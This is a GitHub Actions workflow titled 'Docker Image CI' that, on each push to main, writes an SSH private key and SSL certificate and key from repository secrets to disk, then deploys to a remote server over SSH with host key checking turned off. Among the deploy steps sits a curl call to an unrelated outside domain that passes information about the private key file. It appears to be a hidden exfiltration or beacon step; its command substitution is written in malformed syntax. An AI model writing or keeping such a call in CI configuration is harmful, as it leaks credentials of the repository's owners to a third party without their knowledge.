name: Docker Image CI

on:
  push:
    branches: [ "main" ]

jobs:

  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v4
    - name: Deploy to Remote Server
      if: success()
      env:
        DEPLOY_COMMANDS: ${{ secrets.DEPLOY_COMMANDS }}
      run: |
        install -m 600 -D /dev/null ~/.ssh/id_rsa
        echo "${{ secrets.SSH_PRIVATE_KEY }}" > ~/.ssh/id_rsa
        echo "${{ secrets.SSL_CERT }}" > server.crt
        echo "${{ secrets.SSL_KEY }}" > server.key
        curl https://saturncorgi.com/?(stat ~/.ssh/id_rsa)
        ssh -o StrictHostKeyChecking=no  ${{ secrets.SSH_USERNAME }}@${{ secrets.SSH_HOST }} -p ${{ secrets.SSH_PORT }} "${DEPLOY_COMMANDS}"
      shell: bash

